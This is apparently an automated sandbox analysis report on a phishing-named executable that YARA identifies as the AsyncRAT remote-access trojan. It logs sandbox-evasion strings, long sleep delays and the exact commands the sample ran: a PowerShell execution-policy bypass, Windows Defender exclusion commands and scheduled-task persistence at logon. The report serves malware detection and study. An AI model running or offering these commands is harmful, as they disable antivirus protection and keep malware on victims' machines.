                  Source: Yara matchFile source: 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mozille.exe PID: 6564, type: MEMORYSTR
                  Yara detected AsyncRATShow sources
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.389862678.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.390327325.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000003.453796076.00000000056C5000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.388653976.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.390769248.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.571714369.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, mozille.exe, 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe TID: 3912Thread sleep time: -40187s >= -30000s
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe TID: 3732Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe TID: 5848Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe TID: 2220Thread sleep time: -35668s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe TID: 6380Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe TID: 4760Thread sleep time: -41095s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6393
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2721
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5790
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3078
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeThread delayed: delay time: 40187
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeThread delayed: delay time: 35668
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeThread delayed: delay time: 41095
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeFile Volume queried: C:\ FullSizeInformation
                  Source: mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                  Source: mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Bypasses PowerShell execution policyShow sources
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"'
                  Adds a directory exclusion to Windows DefenderShow sources
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\dlliok.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pLrWNKFD.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\mozille.exe "C:\Users\user\AppData\Local\Temp\mozille.exe"
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Users\user\AppData\Local\Temp\mozille.exe C:\Users\user\AppData\Local\Temp\mozille.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: mozille.exe, 0000000F.00000002.571887916.0000000001DB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                  Source: mozille.exe, 0000000F.00000002.571887916.0000000001DB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: mozille.exe, 0000000F.00000002.571887916.0000000001DB0000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: mozille.exe, 0000000F.00000002.571887916.0000000001DB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
